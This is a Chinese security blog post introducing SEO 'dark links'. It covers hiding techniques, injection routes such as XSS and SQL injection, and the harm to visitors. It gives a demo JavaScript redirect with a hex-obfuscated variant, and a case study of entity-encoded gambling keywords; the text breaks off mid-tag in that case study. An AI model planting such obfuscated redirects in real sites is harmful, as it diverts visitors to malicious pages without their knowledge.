

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="X1ly?S">
  <meta name="keywords" content="网络安全 渗透测试">
  
    <meta name="description" content="前言：暗链的姿势、类型非常的多，不是一篇文章能讲清楚的，这里只是初步认识一下暗链，后续文章会继续深入研究暗链  SEO简介SEO（Search Engine Optimization，搜索引擎优化）是一种通过优化网站的结构、内容和其他相关因素，以提高其在搜索引擎结果页面（SERP）中的排名，从而增加网站的可见性和流量的策略。SEO的主要目标是使网站在相关搜索查询中排名更高，从而吸引更多的有机（非">
<meta property="og:type" content="article">
<meta property="og:title" content="初识SEO暗链">
<meta property="og:url" content="https://example.com/2024/07/22/%E5%88%9D%E8%AF%86SEO%E6%9A%97%E9%93%BE/index.html">
<meta property="og:site_name" content="X1ly?S Blog">
<meta property="og:description" content="前言：暗链的姿势、类型非常的多，不是一篇文章能讲清楚的，这里只是初步认识一下暗链，后续文章会继续深入研究暗链  SEO简介SEO（Search Engine Optimization，搜索引擎优化）是一种通过优化网站的结构、内容和其他相关因素，以提高其在搜索引擎结果页面（SERP）中的排名，从而增加网站的可见性和流量的策略。SEO的主要目标是使网站在相关搜索查询中排名更高，从而吸引更多的有机（非">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://example.com/2024/07/22/%E5%88%9D%E8%AF%86SEO%E6%9A%97%E9%93%BE/1.png">
<meta property="og:image" content="https://example.com/2024/07/22/%E5%88%9D%E8%AF%86SEO%E6%9A%97%E9%93%BE/2.png">
<meta property="og:image" content="https://example.com/2024/07/22/%E5%88%9D%E8%AF%86SEO%E6%9A%97%E9%93%BE/3.png">
<meta property="og:image" content="https://example.com/2024/07/22/%E5%88%9D%E8%AF%86SEO%E6%9A%97%E9%93%BE/4.png">
<meta property="og:image" content="https://example.com/2024/07/22/%E5%88%9D%E8%AF%86SEO%E6%9A%97%E9%93%BE/5.png">
<meta property="og:image" content="https://example.com/2024/07/22/%E5%88%9D%E8%AF%86SEO%E6%9A%97%E9%93%BE/6.png">
<meta property="article:published_time" content="2024-07-22T08:40:24.000Z">
<meta property="article:modified_time" content="2024-07-22T08:43:29.343Z">
<meta property="article:author" content="X1ly?S">
<meta property="article:tag" content="初识SEO暗链">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://example.com/2024/07/22/%E5%88%9D%E8%AF%86SEO%E6%9A%97%E9%93%BE/1.png">
  
  
  
  <title>初识SEO暗链 - X1ly?S Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"|","loop":true,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":false,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"f0DHnqSCglihztWD5hnI8OS8-gzGzoHsz","app_key":"M3h6WgzFRHqbQjc4e8jWn6Ix","server_url":"https://f0dhnqsc.lc-cn-n1-shared.com","path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  
    <!-- Google tag (gtag.js) -->
    <script async>
      if (!Fluid.ctx.dnt) {
        Fluid.utils.createScript("https://www.googletagmanager.com/gtag/js?id=", function() {
          window.dataLayer = window.dataLayer || [];
          function gtag() {
            dataLayer.push(arguments);
          }
          gtag('js', new Date());
          gtag('config', '');
        });
      }
    </script>
  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>X1ly?S Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="初识SEO暗链"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        X1ly?S
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-07-22 16:40" pubdate>
          2024年7月22日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.5k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          30 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">初识SEO暗链</h1>
            
              <p id="updated-time" class="note note-info" style="">
                
                  
                    本文最后更新于 2024年7月22日 下午
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <blockquote>
<p>前言：暗链的姿势、类型非常的多，不是一篇文章能讲清楚的，这里只是初步认识一下暗链，后续文章会继续深入研究暗链</p>
</blockquote>
<h2 id="SEO"><a href="#SEO" class="headerlink" title="SEO"></a>SEO</h2><h3 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h3><p>SEO（Search Engine Optimization，搜索引擎优化）是一种通过优化网站的结构、内容和其他相关因素，以提高其在搜索引擎结果页面（SERP）中的排名，从而增加网站的可见性和流量的策略。SEO的主要目标是使网站在相关搜索查询中排名更高，从而吸引更多的有机（非付费）流量。</p>
<h3 id="SEO的主要组成部分"><a href="#SEO的主要组成部分" class="headerlink" title="SEO的主要组成部分"></a>SEO的主要组成部分</h3><blockquote>
<p>简单看看就行</p>
</blockquote>
<h4 id="关键词研究"><a href="#关键词研究" class="headerlink" title="关键词研究"></a><strong>关键词研究</strong></h4><ul>
<li>确定与网站内容相关的关键词和短语，这些关键词是用户在搜索时可能使用的。</li>
</ul>
<h4 id="网站优化"><a href="#网站优化" class="headerlink" title="网站优化"></a><strong>网站优化</strong></h4><ul>
<li><strong>页面优化</strong>：包括标题标签、meta描述、URL结构、页面内容优化等。</li>
<li><strong>技术优化</strong>：包括网站的加载速度、移动端兼容性、站点地图、robots.txt文件等。</li>
</ul>
<h4 id="内容优化"><a href="#内容优化" class="headerlink" title="内容优化"></a><strong>内容优化</strong></h4><ul>
<li>创建有价值的、相关的、高质量内容，以满足用户需求并包含目标关键词。</li>
</ul>
<h4 id="链接建设"><a href="#链接建设" class="headerlink" title="链接建设"></a><strong>链接建设</strong></h4><ul>
<li><strong>内部链接</strong>：在网站内创建相关链接，帮助搜索引擎理解网站结构。</li>
<li><strong>外部链接</strong>：获取其他网站的链接，以提高网站的权威性和信誉。</li>
</ul>
<h4 id="用户体验"><a href="#用户体验" class="headerlink" title="用户体验"></a><strong>用户体验</strong></h4><ul>
<li>确保网站易于使用、导航顺畅，并提供良好的用户体验。</li>
</ul>
<h4 id="本地SEO"><a href="#本地SEO" class="headerlink" title="本地SEO"></a><strong>本地SEO</strong></h4><ul>
<li>针对特定地理位置优化网站，提升本地搜索结果中的排名。</li>
</ul>
<h4 id="分析与调整"><a href="#分析与调整" class="headerlink" title="分析与调整"></a><strong>分析与调整</strong></h4><ul>
<li>使用工具（如Google Analytics、Google Search Console）跟踪网站的表现，并根据数据不断优化策略。</li>
</ul>
<h3 id="为什么SEO重要"><a href="#为什么SEO重要" class="headerlink" title="为什么SEO重要"></a>为什么SEO重要</h3><blockquote>
<p>简单看看就行</p>
</blockquote>
<ul>
<li><strong>提高可见性</strong>：在搜索引擎中排名靠前可以使网站更容易被发现。</li>
<li><strong>吸引有机流量</strong>：比起付费广告，有机流量通常更具成本效益。</li>
<li><strong>增强用户体验</strong>：优化网站的结构和内容可以提高用户体验。</li>
<li><strong>建立品牌信誉</strong>：在搜索引擎结果中排名靠前可以提升品牌的信誉和可信度。</li>
</ul>
<h2 id="SEO暗链"><a href="#SEO暗链" class="headerlink" title="SEO暗链"></a>SEO暗链</h2><h3 id="简介-1"><a href="#简介-1" class="headerlink" title="简介"></a>简介</h3><p>SEO暗链（也称为隐形链或隐蔽链接）是一种在网页上隐藏的链接，用于提高网页在搜索引擎中的排名。这种技术试图通过将链接藏在用户无法看到的位置或以其他方式隐藏链接，以增加页面的关键词密度和链接权重，从而提升搜索引擎排名。</p>
<h3 id="常见的SEO暗链策略包括"><a href="#常见的SEO暗链策略包括" class="headerlink" title="常见的SEO暗链策略包括"></a>常见的SEO暗链策略包括</h3><h4 id="隐藏文本链接"><a href="#隐藏文本链接" class="headerlink" title="隐藏文本链接"></a><strong>隐藏文本链接</strong></h4><ul>
<li>将链接的文本颜色设置为与背景相同，用户无法看到，但搜索引擎可以识别。</li>
</ul>
<h4 id="CSS隐藏"><a href="#CSS隐藏" class="headerlink" title="CSS隐藏"></a><strong>CSS隐藏</strong></h4><ul>
<li>使用CSS属性（如<code>display: none</code>或<code>visibility: hidden</code>）将链接隐藏在页面上，但搜索引擎仍能抓取。</li>
</ul>
<h4 id="使用HTML注释"><a href="#使用HTML注释" class="headerlink" title="使用HTML注释"></a><strong>使用HTML注释</strong></h4><ul>
<li>将链接放置在HTML注释中，普通用户看不到，搜索引擎可以读取。</li>
</ul>
<h4 id="隐藏在小字体"><a href="#隐藏在小字体" class="headerlink" title="隐藏在小字体"></a><strong>隐藏在小字体</strong></h4><ul>
<li>将链接的字体大小设置为极小，以至于用户无法看到。</li>
</ul>
<h4 id="重复内容链接"><a href="#重复内容链接" class="headerlink" title="重复内容链接"></a><strong>重复内容链接</strong></h4><ul>
<li>在网页上嵌入大量的链接或重复的关键词，增加页面的关键词密度。</li>
</ul>
<h3 id="为什么不推荐使用SEO暗链"><a href="#为什么不推荐使用SEO暗链" class="headerlink" title="为什么不推荐使用SEO暗链"></a>为什么不推荐使用SEO暗链</h3><h4 id="搜索引擎惩罚"><a href="#搜索引擎惩罚" class="headerlink" title="搜索引擎惩罚"></a><strong>搜索引擎惩罚</strong></h4><p>搜索引擎（如Google）会检测到这些隐蔽的链接和欺诈行为，可能会对网站进行惩罚，如降低排名或完全删除索引。</p>
<h4 id="影响网站信誉"><a href="#影响网站信誉" class="headerlink" title="影响网站信誉"></a><strong>影响网站信誉</strong></h4><p>使用这种策略可能会损害网站的信誉，对用户体验造成负面影响。</p>
<h4 id="违反搜索引擎指南"><a href="#违反搜索引擎指南" class="headerlink" title="违反搜索引擎指南"></a><strong>违反搜索引擎指南</strong></h4><p>这种做法通常违反了搜索引擎的质量指南，长期来看，对网站的SEO效果和信誉不利。</p>
<h3 id="暗链分类"><a href="#暗链分类" class="headerlink" title="暗链分类"></a>暗链分类</h3><h4 id="JS引入型暗链"><a href="#JS引入型暗链" class="headerlink" title="JS引入型暗链"></a><strong>JS引入型暗链</strong></h4><p>通过修改网站title，引入外部JavaScript代码来将暗链植入被害网站，当用户通过搜索引擎搜索特定关键字时（你懂的）进入该网站，通过引入的外部JavaScript代码实现跳转到非法网站。这种暗链是本文研究的重点。</p>
<h4 id="html隐藏型暗链"><a href="#html隐藏型暗链" class="headerlink" title="html隐藏型暗链"></a><strong>html隐藏型暗链</strong></h4><p>通过css或者JavaScript代码隐藏暗链，通常是通过position为负数，或者将display设置为none等方式来隐藏，目的是为了提升非法网站的SEO排名，但是这种暗链已经越来越少了，现在的暗链大部分都是JS引入型暗链直接跳转，故此种手法本文不做研究</p>
<h3 id="暗链是怎么被植入的"><a href="#暗链是怎么被植入的" class="headerlink" title="暗链是怎么被植入的"></a>暗链是怎么被植入的</h3><h4 id="XSS（跨站脚本攻击）"><a href="#XSS（跨站脚本攻击）" class="headerlink" title="XSS（跨站脚本攻击）"></a><strong>XSS（跨站脚本攻击）</strong></h4><ul>
<li><strong>注入恶意脚本</strong>：黑客利用XSS漏洞将恶意脚本注入到网页中。这些脚本可能会动态插入暗链，或将现有的链接隐藏在用户无法看到的地方。</li>
<li><strong>攻击用户</strong>：通过XSS攻击获取用户权限或控制，进一步将暗链植入网站内容中。</li>
</ul>
<h4 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a><strong>SQL注入</strong></h4><ul>
<li><strong>修改数据库</strong>：通过SQL注入漏洞，黑客可以修改网站的数据库，插入包含暗链的内容。比如，他们可以修改网页的内容，或添加隐藏的链接。</li>
</ul>
<h4 id="网站管理漏洞"><a href="#网站管理漏洞" class="headerlink" title="网站管理漏洞"></a><strong>网站管理漏洞</strong></h4><ul>
<li><strong>管理员面板</strong>：如果网站的后台管理系统存在安全漏洞，黑客可能会通过这些漏洞直接插入暗链或修改现有内容。</li>
<li><strong>文件上传漏洞</strong>：黑客利用文件上传漏洞上传恶意文件，这些文件可能包含插入暗链的脚本或代码。</li>
</ul>
<h4 id="插件和主题漏洞"><a href="#插件和主题漏洞" class="headerlink" title="插件和主题漏洞"></a><strong>插件和主题漏洞</strong></h4><ul>
<li><strong>CMS插件和主题</strong>：在使用CMS（如WordPress、Drupal等）时，某些插件或主题可能存在安全漏洞。黑客可以利用这些漏洞在网站中插入暗链。</li>
</ul>
<h4 id="服务器配置和安全问题"><a href="#服务器配置和安全问题" class="headerlink" title="服务器配置和安全问题"></a><strong>服务器配置和安全问题</strong></h4><ul>
<li><strong>配置错误</strong>：不当的服务器配置可能会允许未授权的访问或修改网站内容，从而被用来插入暗链。</li>
<li><strong>缺乏安全更新</strong>：服务器软件或网站框架未及时更新可能存在已知的安全漏洞，黑客可能利用这些漏洞插入暗链。</li>
</ul>
<h3 id="暗链对访问者的危害"><a href="#暗链对访问者的危害" class="headerlink" title="暗链对访问者的危害"></a>暗链对访问者的危害</h3><p><strong>恶意软件感染</strong></p>
<ul>
<li><strong>传播病毒</strong>：暗链可能会将访问者引导到含有恶意软件的网站，这些网站可能会自动下载并安装病毒、木马或其他恶意程序，危害计算机安全。</li>
<li><strong>恶意广告</strong>：有时暗链会导致访问者看到恶意广告，这些广告可能会诱导点击，并感染设备。</li>
</ul>
<h4 id="数据泄露"><a href="#数据泄露" class="headerlink" title="数据泄露"></a><strong>数据泄露</strong></h4><ul>
<li><strong>钓鱼攻击</strong>：暗链可能将用户引导到伪装成合法网站的钓鱼网站，窃取个人信息、账户凭证、信用卡信息等敏感数据。</li>
<li><strong>信息收集</strong>：某些暗链可能会将用户引导到收集个人信息的页面，这些页面可能会未经用户同意收集其数据。</li>
</ul>
<h4 id="用户体验恶化"><a href="#用户体验恶化" class="headerlink" title="用户体验恶化"></a><strong>用户体验恶化</strong></h4><ul>
<li><strong>无关内容</strong>：暗链通常将用户引导到与其原始搜索或访问意图无关的内容，影响用户的浏览体验。</li>
<li><strong>加载缓慢</strong>：访问恶意网站或低质量的网站可能会导致页面加载缓慢，影响用户体验。</li>
</ul>
<h4 id="隐私侵犯"><a href="#隐私侵犯" class="headerlink" title="隐私侵犯"></a><strong>隐私侵犯</strong></h4><ul>
<li><strong>追踪用户活动</strong>：某些暗链可能会引导用户访问含有追踪脚本的网站，这些脚本会收集用户的浏览习惯和其他个人信息，用于未经授权的数据分析或广告定位。</li>
</ul>
<h4 id="财务风险"><a href="#财务风险" class="headerlink" title="财务风险"></a><strong>财务风险</strong></h4><ul>
<li><strong>诈骗</strong>：暗链可能引导用户到诈骗网站，诱导用户进行金融交易或购买虚假产品，从而造成财务损失。</li>
<li><strong>点击欺诈</strong>：某些恶意广告可能会通过暗链隐藏在网页中，进行点击欺诈，消耗用户的网络流量或广告预算。</li>
</ul>
<h4 id="法律风险"><a href="#法律风险" class="headerlink" title="法律风险"></a><strong>法律风险</strong></h4><ul>
<li><strong>不合规内容</strong>：访问者可能会被引导到包含非法或不合规内容的网站，这可能导致法律问题或道德困扰。</li>
</ul>
<h2 id="暗链Demo"><a href="#暗链Demo" class="headerlink" title="暗链Demo"></a>暗链Demo</h2><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs js">&lt;script&gt;<br><span class="hljs-variable language_">window</span>.<span class="hljs-property">onload</span> = <span class="hljs-keyword">function</span>(<span class="hljs-params"></span>)&#123;<br>	<span class="hljs-keyword">var</span> hacker_site = <span class="hljs-string">&quot;http://x1lys.github.io&quot;</span>; <span class="hljs-comment">//要跳转到的恶意网站</span><br>	<span class="hljs-variable language_">window</span>.<span class="hljs-property">location</span>.<span class="hljs-property">href</span>=hacker_site;<br>&lt;/script&gt;<br></code></pre></td></tr></table></figure>

<p>这是一段用来跳转网站的js代码，暗中跳转到指定的黑客的恶意网站，好进行下一步的恶意活动</p>
<p>但是会有各种暗链检验工具等等其他检测机制，黑客们肯定不会就直接这样植入暗链，往往会进行一些混淆加密压缩，编码等等来试图躲过一些暗链检测</p>
<p>比如，js混淆编码一下</p>
<img src="/2024/07/22/%E5%88%9D%E8%AF%86SEO%E6%9A%97%E9%93%BE/1.png" srcset="/img/loading.gif" lazyload class="">

<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs js">&lt;script&gt;<br>    <span class="hljs-variable language_">window</span>[<span class="hljs-string">&quot;\x6f\x6e\x6c\x6f\x61\x64&quot;</span>] = <span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) &#123;<br>        <span class="hljs-keyword">var</span> bGyhWG1 = <span class="hljs-string">&quot;\x68\x74\x74\x70\x3a\x2f\x2f\x78\x31\x6c\x79\x73\x2e\x67\x69\x74\x68\x75\x62\x2e\x69\x6f&quot;</span>;<br>        <span class="hljs-variable language_">window</span>.<span class="hljs-property">location</span>.<span class="hljs-property">href</span> = bGyhWG1;<br>    &#125;;<br>    <span class="hljs-variable language_">window</span>.<span class="hljs-property">onload</span> = <span class="hljs-variable language_">window</span>[<span class="hljs-string">&quot;\x6f\x6e\x6c\x6f\x61\x64&quot;</span>];<br>    &lt;/script&gt;<br></code></pre></td></tr></table></figure>

<p>访问就跳转到我的博客网站</p>
<img src="/2024/07/22/%E5%88%9D%E8%AF%86SEO%E6%9A%97%E9%93%BE/2.png" srcset="/img/loading.gif" lazyload class="">

<img src="/2024/07/22/%E5%88%9D%E8%AF%86SEO%E6%9A%97%E9%93%BE/3.png" srcset="/img/loading.gif" lazyload class="">

<h2 id="暗链案例"><a href="#暗链案例" class="headerlink" title="暗链案例"></a>暗链案例</h2><blockquote>
<p>真实情况要比Demo复杂得多，案例摘自：<a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/260516.html">https://www.freebuf.com/articles/web/260516.html</a></p>
</blockquote>
<h3 id="JavaScript中window对象引入暗链"><a href="#JavaScript中window对象引入暗链" class="headerlink" title="JavaScript中window对象引入暗链"></a>JavaScript中window对象引入暗链</h3><p>调用widnows对象中的document.write方法将外部的JS代码引入到当前页面，通常还会配合使用16进制编码来实现隐藏的目的</p>
<img src="/2024/07/22/%E5%88%9D%E8%AF%86SEO%E6%9A%97%E9%93%BE/4.png" srcset="/img/loading.gif" lazyload class="">

<p>这个案例中，黑客将网站的title、keywords、description都换成了10进制的unicode编码，这样的确能起到一些隐藏的作用，10进制unicode编码在浏览器解析的时候会还原成字符</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">title</span>&gt;</span><span class="hljs-symbol">&amp;#21271;</span><span class="hljs-symbol">&amp;#20140;</span><span class="hljs-symbol">&amp;#36187;</span><span class="hljs-symbol">&amp;#36710;</span><span class="hljs-symbol">&amp;#112;</span><span class="hljs-symbol">&amp;#107;</span><span class="hljs-symbol">&amp;#49;</span><span class="hljs-symbol">&amp;#48;</span><span class="hljs-symbol">&amp;#32;</span><span class="hljs-symbol">&amp;#21271;</span><span class="hljs-symbol">&amp;#20140;</span><span class="hljs-symbol">&amp;#36187;</span><span class="hljs-symbol">&amp;#36710;</span><span class="hljs-symbol">&amp;#112;</span><span class="hljs-symbol">&amp;#107;</span><span class="hljs-symbol">&amp;#49;</span><span class="hljs-symbol">&amp;#48;</span><span class="hljs-symbol">&amp;#21382;</span><span class="hljs-symbol">&amp;#21490;</span><span class="hljs-symbol">&amp;#35760;</span><span class="hljs-symbol">&amp;#24405;</span><span class="hljs-symbol">&amp;#32;</span><span class="hljs-symbol">&amp;#112;</span><span class="hljs-symbol">&amp;#107;</span><span class="hljs-symbol">&amp;#49;</span><span class="hljs-symbol">&amp;#48;</span><span class="hljs-symbol">&amp;#32593;</span><span class="hljs-symbol">&amp;#19978;</span><span class="hljs-symbol">&amp;#25237;</span><span class="hljs-symbol">&amp;#27880;</span><span class="hljs-symbol">&amp;#45;</span><span class="hljs-symbol">&amp;#21271;</span><span class="hljs-symbol">&amp;#20140;</span><span class="hljs-symbol">&amp;#112;</span><span class="hljs-symbol">&amp;#107;</span><span class="hljs-symbol">&amp;#49;</span><span class="hljs-symbol">&amp;#48;</span><span class="hljs-symbol">&amp;#30452;</span><span class="hljs-symbol">&amp;#25773;</span><span class="hljs-symbol">&amp;#32593;</span><span class="hljs-tag">&lt;/<span class="hljs-name">title</span>&gt;</span> <span class="hljs-tag">&lt;<span class="hljs-name">meta</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&quot;keywords&quot;</span> <span class="hljs-attr">content</span>=<span class="hljs-string">&quot;<span class="hljs-symbol">&amp;#21271;</span><span class="hljs-symbol">&amp;#20140;</span><span class="hljs-symbol">&amp;#112;</span><span class="hljs-symbol">&amp;#107;</span><span class="hljs-symbol">&amp;#49;</span><span class="hljs-symbol">&amp;#48;</span><span class="hljs-symbol">&amp;#24320;</span><span class="hljs-symbol">&amp;#22870;</span><span class="hljs-symbol">&amp;#30452;</span><span class="hljs-symbol">&amp;#25773;</span><span class="hljs-symbol">&amp;#44;</span><span class="hljs-symbol">&amp;#112;</span><span class="hljs-symbol">&amp;#107;</span><span class="hljs-symbol">&amp;#49;</span><span class="hljs-symbol">&amp;#48;</span><span class="hljs-symbol">&amp;#24320;</span><span class="hljs-symbol">&amp;#22870;</span><span class="hljs-symbol">&amp;#30452;</span><span class="hljs-symbol">&amp;#25773;</span><span class="hljs-symbol">&amp;#44;</span><span class="hljs-symbol">&amp;#21271;</span><span class="hljs-symbol">&amp;#20140;</span><span class="hljs-symbol">&amp;#36187;</span><span class="hljs-symbol">&amp;#36710;</span><span class="hljs-symbol">&amp;#112;</span><span class="hljs-symbol">&amp;#107;</span><span class="hljs-symbol">&amp;#49;</span><span class="hljs-symbol">&amp;#48;</span><span class="hljs-symbol">&amp;#24320;</span><span class="hljs-symbol">&amp;#22870;</span><span class="hljs-symbol">&amp;#32467;</span><span class="hljs-symbol">&amp;#26524;</span><span class="hljs-symbol">&amp;#44;</span><span class="hljs-symbol">&amp;#21271;</span><span class="hljs-symbol">&amp;#20140;</span><span class="hljs-symbol">&amp;#36187;</span><span class="hljs-symbol">&amp;#36710;</span><span class="hljs-symbol">&amp;#112;</span><span class="hljs-symbol">&amp;#107;</span><span class="hljs-symbol">&amp;#49;</span><span class="hljs-symbol">&amp;#48;</span><span class="hljs-symbol">&amp;#24320;</span><span class="hljs-symbol">&amp;#22870;</span><span class="hljs-symbol">&amp;#30452;</span><span class="hljs-symbol">&amp;#25773;</span><span class="hljs-symbol">&amp;#44;</span><span class="hljs-symbol">&amp;#21271;</span><span class="hljs-symbol">&amp;#20140;</span><span class="hljs-symbol">&amp;#36187;</span><span class="hljs-symbol">&amp;#36710;</span><span class="hljs-symbol">&amp;#112;</span><span class="hljs-symbol">&amp;#107;</span><span class="hljs-symbol">&amp;#49;</span><span class="hljs-symbol">&amp;#48;</span><span class="hljs-symbol">&amp;#25237;</span><span class="hljs-symbol">&amp;#27880;</span><span class="hljs-symbol">&amp;#32593;</span><span class="hljs-symbol">&amp;#31449;</span><span class="hljs-symbol">&amp;#44;</span><span class="hljs-symbol">&amp;#112;</span><span class="hljs-symbol">&amp;#107;</span><span class="hljs-symbol">&amp;#49;</span><span class="hljs-symbol">&amp;#48;</span><span class="hljs-symbol">&amp;#32593;</span><span class="hljs-symbol">&amp;#19978;</span><span class="hljs-symbol">&amp;#24320;</span><span class="hljs-symbol">&amp;#25143;</span><span class="hljs-symbol">&amp;#44;</span><span class="hljs-symbol">&amp;#112;</span><span class="hljs-symbol">&amp;#107;</span><span class="hljs-symbol">&amp;#49;</span><span class="hljs-symbol">&amp;#48;</span><span class="hljs-symbol">&amp;#32593;</span><span class="hljs-symbol">&amp;#19978;</span><span class="hljs-symbol">&amp;#25237;</span><span class="hljs-symbol">&amp;#27880;</span><span class="hljs-symbol">&amp;#44;</span><span class="hljs-symbol">&amp;#21271;</span><span class="hljs-symbol">&amp;#20140;</span><span class="hljs-symbol">&amp;#36187;</span><span class="hljs-symbol">&amp;#36710;</span><span class="hljs-symbol">&amp;#35270;</span><span class="hljs-symbol">&amp;#39057;</span><span class="hljs-symbol">&amp;#32593;</span>&quot;</span> /&gt;</span> <span class="hljs-tag">&lt;<span class="hljs-name">meta</span> <span 